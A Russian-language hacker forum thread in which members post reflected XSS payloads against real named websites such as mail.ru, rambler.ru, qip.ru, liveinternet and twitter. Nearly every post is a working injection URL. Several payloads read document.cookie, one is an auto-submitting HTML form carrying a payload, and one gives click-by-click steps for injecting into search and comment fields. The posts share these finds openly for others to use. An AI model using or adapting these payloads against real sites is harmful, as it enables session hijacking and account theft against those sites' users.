Пассивные xss на почтовых серверах

Discussion in 'Уязвимости Mail-сервисов' started by Constantine, 25 Oct 2008.

  1. Mil-Net

    Mil-Net Member

    Joined:
    24 May 2009
    Messages:
    29
    Likes Received:
    13
    Reputations:
    1
    Mail.ru

    http://voip.agent.mail.ru/cgi-bin/mailrubin.dll/cards.html?inf="><script>alert('BY HACKED Mil-Net')</script>

    Нашол сам недавно!
    Пускаю по рукам :)
     
    3 people like this.
  2. Mil-Net

    Mil-Net Member

    Joined:
    24 May 2009
    Messages:
    29
    Likes Received:
    13
    Reputations:
    1
    Rambler.ru

    http://planeta.rambler.ru/community/icq/?tags=68773422%22%3E%3Cscript%3Ealert(%27BY HACKED Mil-Net%27)%3C/script%3E%3Cnoscript%3E
     
    1 person likes this.
  3. brain[pillow]

    brain[pillow] Active Member

    Joined:
    7 Nov 2008
    Messages:
    7
    Likes Received:
    103
    Reputations:
    74
    Twitter - не почтовик, но надеюсь меня не побьют:

    http://search.twitter.com/search?q=%26%2339%3B)%3Balert(%26%2339%3Bxek%26%2339%3B)%3B%2F%2F

    И клацаем справа на "Twet the results".
     
    1 person likes this.
  4. Mil-Net

    Mil-Net Member

    Joined:
    24 May 2009
    Messages:
    29
    Likes Received:
    13
    Reputations:
    1
    Ну тогда я тоже выложу так как не нашол подходящей темы!
    Магазин по продаже софта!

    http://soft.qwerty.ru/search/index.php?q=%22%3E%3Cscript%3Ealert%28%27BY+HACKED+Mil-Net%27%29%3C%2Fscript%3E&s=%CD%E0%E9%F2%E8
     
    1 person likes this.
  5. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    Почта? Почта!
    http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
     
    _________________________
    1 person likes this.
  6. vitaliy_n73

    vitaliy_n73 Member

    Joined:
    2 Jul 2009
    Messages:
    98
    Likes Received:
    21
    Reputations:
    0
    http://autorambler.ru/journal/testdrives/?brand=%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E
     
    3 people like this.
  7. vitaliy_n73

    vitaliy_n73 Member

    Joined:
    2 Jul 2009
    Messages:
    98
    Likes Received:
    21
    Reputations:
    0
    http://autorambler.ru/cars/by-brand/?brand=62&model=40&no=1%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E
     
    2 people like this.
  8. vitaliy_n73

    vitaliy_n73 Member

    Joined:
    2 Jul 2009
    Messages:
    98
    Likes Received:
    21
    Reputations:
    0
    http://autorambler.ru/cars/by-brand/?brand=62&model=40&no=1&period=day%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E
     
    2 people like this.
  9. W@r.N0i$e

    Joined:
    2 Jun 2009
    Messages:
    54
    Likes Received:
    51
    Reputations:
    12
    Пассивная xss на mail.ru
    Code:
    https://auth.mail.ru/cgi-bin/auth?page=&post=&login_from=&Login="><SCRIPT>alert("XSS")<%2FSCRIPT>">&Domain=mail.ru&Password=yyy
     
    #89 [email protected]$e, 9 Jan 2010
    Last edited: 9 Jan 2010
    1 person likes this.
  10. kl0yn

    kl0yn New Member

    Joined:
    15 Dec 2008
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Повтор!

    http://forum.antichat.ru/showpost.php?p=1645042&postcount=86
     
  11. gringo60

    gringo60 Member

    Joined:
    12 Apr 2009
    Messages:
    9
    Likes Received:
    5
    Reputations:
    3
    Работает у авторизированных .

    http://11x11.mail.ru/users/10000125/'%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
  12. mikail

    mikail New Member

    Joined:
    13 Feb 2010
    Messages:
    3
    Likes Received:
    2
    Reputations:
    0
    http://afisha.rambler.ru/message.html?id=33028434&pg=%22%3E%3Cscript%3Ealert%28%27mikail%27%29%3C/script%3E
     
    2 people like this.
  13. gringo60

    gringo60 Member

    Joined:
    12 Apr 2009
    Messages:
    9
    Likes Received:
    5
    Reputations:
    3
    http://file.qip.ru/preview.jsp?w=200%27&h=200%27&s=no&b=yes&l=javascript:alert(document.cookie);
     
    2 people like this.
  14. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    http://mail.am

    http://m.mail.am/mail/util.php?func=info&sort_subject='"><script>alert();</script>


    http://mirtesen.ru
    http://mirtesen.ru/people/map?city=&igp=#search&<img src=s onerror=alert(document.cookie)>&&
     
    _________________________
    #94 Uex Urgent, 25 Apr 2010
    Last edited: 3 May 2010
    4 people like this.
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.everyday.com

    http://www.register.everyday.com/reg_step.phtml?REG_TEXT_FIRST_NAME="><script>alert('0_o')</script>
     
    _________________________
  16. !!!SpartakFan!!!

    Joined:
    28 Aug 2009
    Messages:
    0
    Likes Received:
    7
    Reputations:
    6
    http://list.ngs.ru/page.php?do='search&bool=and&substring=0&mh=10&query="><script>alert(document.cookie)</script>
     
    2 people like this.
  17. Meecript_

    Meecript_ Banned

    Joined:
    29 Oct 2008
    Messages:
    194
    Likes Received:
    62
    Reputations:
    32
    Очень даже интересно :)
    Особенно в таком виде:
     
  18. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    Code:
    http://forum2.km.ru/keyboard.aspx?id=</script><script>alert(document.cookie)</script>
    Code:
    http://vkrugudruzei.ru/search/interest.asp?iname=%F2%E0%ED%F6%FB&igroup=&iequal=1>"><script>alert(document.cookie)</script>
     
    #98 Ruslan1817, 20 May 2010
    Last edited: 20 May 2010
    1 person likes this.
  19. life_glider

    life_glider Member

    Joined:
    13 Apr 2010
    Messages:
    42
    Likes Received:
    25
    Reputations:
    33
    liveinternet

    liveinternet
    PHP:
    <body onload="document.UsrSrchImportFormSrch.submit();">
    <
    form id="UsrSrchImportFormSrch" action="http://www.liveinternet.ru/importmail.php?cmd=getbook_icq" method="post" name="UsrSrchImportFormSrch" onKeyDown="checkKey('UsrSrchImportFormSrch');"
                  <
    input class="SrvBorderBlue" type="text" name="addicqs" value='"><script>alert(/Found by life_glider/);</script> <br "' /> 
                  <
    input class="Hi" type="submit" value="Искать!" />
                  </
    form>    
    </
    body>
     
    #99 life_glider, 23 May 2010
    Last edited: 24 May 2010
    1 person likes this.
  20. BlackFan

    BlackFan Member

    Joined:
    3 Jan 2009
    Messages:
    47
    Likes Received:
    40
    Reputations:
    32
    http://maps.mail.ru

    В строке поиска:
    Code:
    ' onMouseOver='alert(1)'>
    и "Найти"



    kards.qip.ru
    В любых комментариях в login/pass вставляем
    Code:
    "><img src='.' onerror='alert()'>
    И нажимаем "Добавить комментарий"
     
    #100 BlackFan, 11 Jun 2010
    Last edited: 14 Jun 2010
    3 people like this.